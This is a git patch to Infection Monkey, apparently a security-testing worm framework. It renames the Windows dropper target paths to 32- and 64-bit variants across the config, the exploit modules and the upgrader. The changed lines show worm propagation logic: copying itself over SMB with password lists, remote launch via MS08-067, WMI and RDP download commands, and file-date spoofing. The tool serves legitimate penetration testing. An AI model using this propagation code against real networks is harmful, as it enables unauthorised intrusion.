From ee23703bfa4b6d48ee55959b2132f78a2382c94b Mon Sep 17 00:00:00 2001 From: Itay Mizeretz Date: Sun, 4 Mar 2018 17:05:43 +0200 Subject: [PATCH] Monkey now uses different names for 32,64bit on windows. No need to use dropper or rename moneky --- infection_monkey/config.py | 11 +++++------ infection_monkey/example.conf | 4 ++-- infection_monkey/exploit/rdpgrinder.py | 4 ++-- infection_monkey/exploit/smbexec.py | 6 +++--- infection_monkey/exploit/win_ms08_067.py | 8 ++++---- infection_monkey/exploit/wmiexec.py | 6 +++--- infection_monkey/windows_upgrader.py | 10 +++++----- monkey_island/cc/services/config.py | 21 ++++++++++----------- 8 files changed, 34 insertions(+), 36 deletions(-) diff --git a/infection_monkey/config.py b/infection_monkey/config.py index 0ee609cac..42140172f 100644 --- a/infection_monkey/config.py +++ b/infection_monkey/config.py @@ -9,6 +9,7 @@ from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter SambaCryExploiter, ElasticGroovyExploiter from network import TcpScanner, PingScanner, SMBFinger, SSHFinger, HTTPFinger, MySQLFinger, ElasticFinger from network.range import FixedRange +from windows_upgrader import WindowsUpgrader __author__ = 'itamar' @@ -115,14 +116,12 @@ class Configuration(object): dropper_set_date = True dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll" dropper_date_reference_path_linux = '/bin/sh' - dropper_target_path = r"C:\Windows\monkey.exe" + dropper_target_path_win_32 = r"C:\Windows\monkey32.exe" + dropper_target_path_win_64 = r"C:\Windows\monkey64.exe" dropper_target_path_linux = '/tmp/monkey' - ########################### - # Windows upgrader config - ########################### - - windows_upgrader_temp_path = r"C:\Windows\monkey64.exe" + def get_dropper_target_path_win(self): + return self.dropper_target_path_win_64 if WindowsUpgrader.is_64bit_python() else self.dropper_target_path_win_32 ########################### # Kill file diff --git a/infection_monkey/example.conf b/infection_monkey/example.conf index 8acf8729f..9cc036981 100644 --- a/infection_monkey/example.conf +++ b/infection_monkey/example.conf @@ -22,8 +22,8 @@ "dropper_log_path_windows": "%temp%\\~df1562.tmp", "dropper_log_path_linux": "/tmp/user-1562", "dropper_set_date": true, - "dropper_target_path": "C:\\Windows\\monkey.exe", - "windows_upgrader_temp_path": "C:\\Windows\\monkey64.exe", + "dropper_target_path_win_32": "C:\\Windows\\monkey32.exe", + "dropper_target_path_win_64": "C:\\Windows\\monkey64.exe", "dropper_target_path_linux": "/tmp/monkey", diff --git a/infection_monkey/exploit/rdpgrinder.py b/infection_monkey/exploit/rdpgrinder.py index 606f44f90..fb4d0f32d 100644 --- a/infection_monkey/exploit/rdpgrinder.py +++ b/infection_monkey/exploit/rdpgrinder.py @@ -278,11 +278,11 @@ class RdpExploiter(HostExploiter): if self._config.rdp_use_vbs_download: command = RDP_CMDLINE_HTTP_VBS % { - 'monkey_path': self._config.dropper_target_path, + 'monkey_path': self._config.get_dropper_target_path_win(), 'http_path': http_path, 'parameters': cmdline} else: command = RDP_CMDLINE_HTTP_BITS % { - 'monkey_path': self._config.dropper_target_path, + 'monkey_path': self._config.get_dropper_target_path_win(), 'http_path': http_path, 'parameters': cmdline} user_password_pairs = self._config.get_exploit_user_password_pairs() diff --git a/infection_monkey/exploit/smbexec.py b/infection_monkey/exploit/smbexec.py index b76a7bce6..717810bf9 100644 --- a/infection_monkey/exploit/smbexec.py +++ b/infection_monkey/exploit/smbexec.py @@ -57,7 +57,7 @@ class SmbExploiter(HostExploiter): # copy the file remotely using SMB remote_full_path = SmbTools.copy_file(self.host, src_path, - self._config.dropper_target_path, + self._config.get_dropper_target_path_win(), user, password, lm_hash, @@ -85,9 +85,9 @@ class SmbExploiter(HostExploiter): return False # execute the remote dropper in case the path isn't final - if remote_full_path.lower() != self._config.dropper_target_path.lower(): + if remote_full_path.lower() != self._config.get_dropper_target_path_win().lower(): cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \ - build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path) + build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win()) else: cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \ build_monkey_commandline(self.host, get_monkey_depth() - 1) diff --git a/infection_monkey/exploit/win_ms08_067.py b/infection_monkey/exploit/win_ms08_067.py index 51393ea69..b29012d47 100644 --- a/infection_monkey/exploit/win_ms08_067.py +++ b/infection_monkey/exploit/win_ms08_067.py @@ -214,7 +214,7 @@ class Ms08_067_Exploiter(HostExploiter): # copy the file remotely using SMB remote_full_path = SmbTools.copy_file(self.host, src_path, - self._config.dropper_target_path, + self._config.get_dropper_target_path_win(), self._config.ms08_067_remote_user_add, self._config.ms08_067_remote_user_pass) @@ -223,7 +223,7 @@ class Ms08_067_Exploiter(HostExploiter): for password in self._config.exploit_password_list: remote_full_path = SmbTools.copy_file(self.host, src_path, - self._config.dropper_target_path, + self._config.get_dropper_target_path_win(), "Administrator", password) if remote_full_path: @@ -233,9 +233,9 @@ class Ms08_067_Exploiter(HostExploiter): return False # execute the remote dropper in case the path isn't final - if remote_full_path.lower() != self._config.dropper_target_path.lower(): + if remote_full_path.lower() != self._config.get_dropper_target_path_win().lower(): cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ - build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path) + build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win()) else: cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ build_monkey_commandline(self.host, get_monkey_depth() - 1) diff --git a/infection_monkey/exploit/wmiexec.py b/infection_monkey/exploit/wmiexec.py index 1a77a7347..0db4be6ef 100644 --- a/infection_monkey/exploit/wmiexec.py +++ b/infection_monkey/exploit/wmiexec.py @@ -77,7 +77,7 @@ class WmiExploiter(HostExploiter): # copy the file remotely using SMB remote_full_path = SmbTools.copy_file(self.host, src_path, - self._config.dropper_target_path, + self._config.get_dropper_target_path_win(), user, password, lm_hash, @@ -88,9 +88,9 @@ class WmiExploiter(HostExploiter): wmi_connection.close() return False # execute the remote dropper in case the path isn't final - elif remote_full_path.lower() != self._config.dropper_target_path.lower(): + elif remote_full_path.lower() != self._config.get_dropper_target_path_win().lower(): cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \ - build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path) + build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.get_dropper_target_path_win()) else: cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \ build_monkey_commandline(self.host, get_monkey_depth() - 1) diff --git a/infection_monkey/windows_upgrader.py b/infection_monkey/windows_upgrader.py index 994a17f96..c63b64524 100644 --- a/infection_monkey/windows_upgrader.py +++ b/infection_monkey/windows_upgrader.py @@ -10,7 +10,7 @@ import monkeyfs from config import WormConfiguration from control import ControlClient from exploit.tools import build_monkey_commandline_explicitly -from model import DROPPER_CMDLINE_WINDOWS +from model import MONKEY_CMDLINE_WINDOWS __author__ = 'itay.mizeretz' @@ -45,15 +45,15 @@ class WindowsUpgrader(object): monkey_64_path = ControlClient.download_monkey_exe_by_os(True, False) with monkeyfs.open(monkey_64_path, "rb") as downloaded_monkey_file: monkey_bin = downloaded_monkey_file.read() - with open(WormConfiguration.windows_upgrader_temp_path, 'wb') as written_monkey_file: + with open(WormConfiguration.dropper_target_path_win_64, 'wb') as written_monkey_file: written_monkey_file.write(monkey_bin) depth = int(opts.depth) if opts.depth is not None else None monkey_options = build_monkey_commandline_explicitly( - opts.parent, opts.tunnel, opts.server, depth, WormConfiguration.dropper_target_path) + opts.parent, opts.tunnel, opts.server, depth) - monkey_cmdline = DROPPER_CMDLINE_WINDOWS % { - 'dropper_path': WormConfiguration.windows_upgrader_temp_path} + monkey_options + monkey_cmdline = MONKEY_CMDLINE_WINDOWS % { + 'monkey_path': WormConfiguration.dropper_target_path_win_64} + monkey_options monkey_process = subprocess.Popen(monkey_cmdline, shell=True, stdin=None, stdout=None, stderr=None, diff --git a/monkey_island/cc/services/config.py b/monkey_island/cc/services/config.py index 981319db4..3001ed768 100644 --- a/monkey_island/cc/services/config.py +++ b/monkey_island/cc/services/config.py @@ -350,14 +350,7 @@ SCHEMA = { "type": "integer", "default": 60, "description": "Time to keep tunnel open before going down after last exploit (in seconds)" - }, - "windows_upgrader_temp_path": { - "title": "Temporary upgrade path for 64bit monkey on Windows", - "type": "string", - "default": "C:\\Windows\\monkey64.exe", - "description": "Determines where should the dropper place the 64 bit monkey while" - " upgrading on a Windows machine" - }, + } } }, "classes": { @@ -447,10 +440,16 @@ SCHEMA = { "default": "/tmp/monkey", "description": "Determines where should the dropper place the monkey on a Linux machine" }, - "dropper_target_path": { - "title": "Dropper target path on Windows", + "dropper_target_path_win_32": { + "title": "Dropper target path on Windows (32bit)", "type": "string", - "default": "C:\\Windows\\monkey.exe", + "default": "C:\\Windows\\monkey32.exe", + "description": "Determines where should the dropper place the monkey on a Windows machine" + }, + "dropper_target_path_win_64": { + "title": "Dropper target path on Windows (64bit)", + "type": "string", + "default": "C:\\Windows\\monkey64.exe", "description": "Determines where should the dropper place the monkey on a Windows machine" }, "dropper_try_move_first": {